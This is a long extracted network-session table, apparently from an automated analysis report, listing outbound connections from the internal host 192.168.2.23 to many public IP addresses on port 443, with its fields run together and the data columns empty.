                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12153192.168.2.2345510137.147.154.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12154192.168.2.235526858.233.211.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12155192.168.2.233860089.87.81.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12156192.168.2.2337054194.5.248.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12157192.168.2.2345100193.110.28.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12158192.168.2.2359500163.52.238.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12159192.168.2.2357632216.134.110.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12160192.168.2.234183445.166.98.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12161192.168.2.234722672.244.51.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12162192.168.2.233862453.151.218.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12163192.168.2.2338190209.146.56.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12164192.168.2.2338744171.221.34.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12165192.168.2.2350570211.249.71.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12166192.168.2.2350706204.183.136.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12167192.168.2.2348788219.9.151.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12168192.168.2.2358408100.139.163.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12169192.168.2.2348756133.195.17.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12170192.168.2.235514823.168.151.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12171192.168.2.2354772131.131.140.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12172192.168.2.234054686.208.103.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12173192.168.2.2352182134.134.43.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12174192.168.2.234393219.34.124.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12175192.168.2.2347928197.180.102.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12176192.168.2.235118259.96.36.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12177192.168.2.234379439.0.243.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12178192.168.2.233575217.158.26.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12179192.168.2.2357936209.109.24.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12180192.168.2.234004850.7.254.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12181192.168.2.2348674204.21.203.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12182192.168.2.235419450.68.34.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12183192.168.2.235390057.78.24.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12184192.168.2.2337404198.135.225.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12185192.168.2.2338064116.104.209.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12186192.168.2.2336656189.45.159.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12187192.168.2.235880636.91.9.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12188192.168.2.2350434107.232.66.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12189192.168.2.233867251.156.3.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12190192.168.2.23401684.235.206.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12191192.168.2.2358784102.218.187.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192192.168.2.2349910197.98.102.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12193192.168.2.2358732223.37.72.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12194192.168.2.2342708113.205.178.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12195192.168.2.2339530122.38.4.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12196192.168.2.2358668131.23.211.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12197192.168.2.2349312154.161.136.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12198192.168.2.235581878.11.159.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12199192.168.2.235688018.161.127.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12200192.168.2.234913441.116.250.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12201192.168.2.2343422136.246.112.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12202192.168.2.234762850.119.240.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12203192.168.2.233603273.111.215.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12204192.168.2.2356792121.181.243.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12205192.168.2.2341502197.136.244.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12206192.168.2.23463281.112.53.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12207192.168.2.2336092144.14.20.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12208192.168.2.2359190156.100.11.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12209192.168.2.2343142102.221.74.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12210192.168.2.23434801.249.47.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12211192.168.2.2357578222.252.33.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12212192.168.2.2333418219.193.128.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12213192.168.2.234637057.203.36.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12214192.168.2.2353986223.229.75.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12215192.168.2.2343970175.22.190.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12216192.168.2.234677066.229.152.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12217192.168.2.2343772136.2.153.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12218192.168.2.2359130109.240.77.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12219192.168.2.23544564.184.113.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12220192.168.2.2349138203.157.209.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12221192.168.2.233788890.11.190.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12222192.168.2.234908849.158.217.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12223192.168.2.2338718117.70.16.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12224192.168.2.235875417.100.53.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12225192.168.2.235625493.232.154.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12226192.168.2.2333848150.128.80.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12227192.168.2.235734244.97.255.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12228192.168.2.2340780211.123.203.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12229192.168.2.2358624109.71.140.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12230192.168.2.2333796202.156.131.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12231192.168.2.2353352136.38.91.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12232192.168.2.2346100118.180.193.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12233192.168.2.2343630180.148.68.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12234192.168.2.2351704147.83.49.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12235192.168.2.234069894.63.99.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12236192.168.2.2355274143.50.58.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12237192.168.2.235000244.110.166.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12238192.168.2.2360692190.51.138.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12239192.168.2.2359222107.49.26.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12240192.168.2.2353606156.243.215.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12241192.168.2.233880451.101.63.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12242192.168.2.2339766135.216.21.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12243192.168.2.2356044193.28.122.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12244192.168.2.2360224154.0.113.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12245192.168.2.2354908178.186.6.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12246192.168.2.2348706151.48.20.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12247192.168.2.2349432218.22.174.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12248192.168.2.2343088189.115.74.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12249192.168.2.2337630133.24.71.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12250192.168.2.234095664.56.189.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12251192.168.2.233528646.73.213.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12252192.168.2.233827219.141.161.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12253192.168.2.234794088.54.137.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12254192.168.2.235417035.156.39.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12255192.168.2.2348024164.190.13.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12256192.168.2.2357592200.135.237.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12257192.168.2.2337428101.198.209.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12258192.168.2.2333398135.173.134.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12259192.168.2.234109057.117.55.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12260192.168.2.2344784217.122.10.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12261192.168.2.2357006172.182.70.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12262192.168.2.2339786147.112.110.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12263192.168.2.2344182104.92.224.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12264192.168.2.233724651.137.60.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12265192.168.2.2345230105.216.148.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12266192.168.2.23607521.241.155.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12267192.168.2.2347822116.251.117.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12268192.168.2.2357518177.20.58.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12269192.168.2.2347644201.146.218.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12270192.168.2.234673091.148.253.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12271192.168.2.235736880.39.229.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12272192.168.2.2345826113.47.204.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12273192.168.2.233910017.123.240.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12274192.168.2.2342694112.115.15.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12275192.168.2.2341094202.218.76.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12276192.168.2.2335862145.21.149.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12277192.168.2.2345782210.122.34.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12278192.168.2.235638624.8.183.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12279192.168.2.2342034195.131.69.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12280192.168.2.235824027.137.172.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12281192.168.2.236085699.41.197.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12282192.168.2.2359420203.0.10.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12283192.168.2.233904697.240.236.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12284192.168.2.2342726173.233.187.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12285192.168.2.2341156211.182.251.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12286192.168.2.23352845.82.135.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12287192.168.2.2352122189.153.62.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12288192.168.2.236039857.243.151.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12289192.168.2.2339492117.65.157.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12290192.168.2.2346040213.175.157.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12291192.168.2.233856036.97.202.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12292192.168.2.235478290.206.184.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12293192.168.2.23535884.202.109.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12294192.168.2.235194264.223.156.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12295192.168.2.2337120173.124.12.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12296192.168.2.2348430145.15.0.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12297192.168.2.2350486191.50.160.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12298192.168.2.2360132155.151.241.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12299192.168.2.234679887.140.45.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12300192.168.2.2349150182.140.11.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12301192.168.2.234784423.179.216.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12302192.168.2.2352718195.71.204.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12303192.168.2.235990865.237.60.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12304192.168.2.2346372218.174.208.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12305192.168.2.2348166142.68.53.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12306192.168.2.2358102198.158.239.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12307192.168.2.2343048183.25.169.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12308192.168.2.2342898186.70.210.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12309192.168.2.236049259.187.250.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12310192.168.2.2340972123.184.161.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12311192.168.2.234552631.238.224.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12312192.168.2.235392897.123.57.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12313192.168.2.234715023.105.84.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12314192.168.2.2348480218.183.98.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12315192.168.2.2335432132.103.235.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12316192.168.2.236051458.0.77.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12317192.168.2.234429092.5.117.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12318192.168.2.2335614126.155.16.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12319192.168.2.234004660.2.232.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12320192.168.2.235450483.71.49.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12321192.168.2.235368278.162.73.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12322192.168.2.234470442.172.25.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12323192.168.2.2340468177.79.210.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12324192.168.2.2340454140.136.134.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12325192.168.2.235408875.230.100.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12326192.168.2.234410047.32.156.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12327192.168.2.2357032163.159.115.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12328192.168.2.233307413.206.140.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12329192.168.2.2351584101.236.51.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12330192.168.2.2333360149.230.151.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12331192.168.2.235412499.25.250.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12332192.168.2.2358462114.226.8.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12333192.168.2.2351038155.244.93.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12334192.168.2.234042232.91.102.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12335192.168.2.235418620.119.183.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12336192.168.2.234575667.90.117.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12337192.168.2.2349036172.36.159.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12338192.168.2.2338394166.243.113.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12339192.168.2.235171232.17.141.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12340192.168.2.234397272.58.57.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12341192.168.2.2352224222.45.108.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12342192.168.2.235152063.121.18.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12343192.168.2.234207669.172.253.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12344192.168.2.235102617.49.201.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12345192.168.2.235638498.92.189.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12346192.168.2.2357894173.212.231.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12347192.168.2.2349678148.63.2.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12348192.168.2.2354852128.212.66.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12349192.168.2.235854862.171.98.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12350192.168.2.236060643.172.156.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12351192.168.2.2335282198.71.168.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12352192.168.2.235534239.10.205.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12353192.168.2.236025620.54.57.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12354192.168.2.2351220125.77.67.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12355192.168.2.2349942177.65.244.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12356192.168.2.2345004101.57.106.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12357192.168.2.235366465.149.120.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12358192.168.2.234464884.51.66.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12359192.168.2.2338396216.210.159.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12360192.168.2.2359532197.134.220.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12361192.168.2.23547929.130.127.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12362192.168.2.23516369.245.70.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12363192.168.2.2355848173.123.91.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12364192.168.2.2341920119.213.13.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12365192.168.2.234698850.22.167.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12366192.168.2.233711058.102.126.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12367192.168.2.234684627.127.173.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12368192.168.2.2340528103.150.6.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12369192.168.2.235045482.123.21.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12370192.168.2.2355756222.140.24.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12371192.168.2.235713249.128.243.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12372192.168.2.2346460130.200.148.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12373192.168.2.2356218162.191.221.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12374192.168.2.233706617.3.67.50443
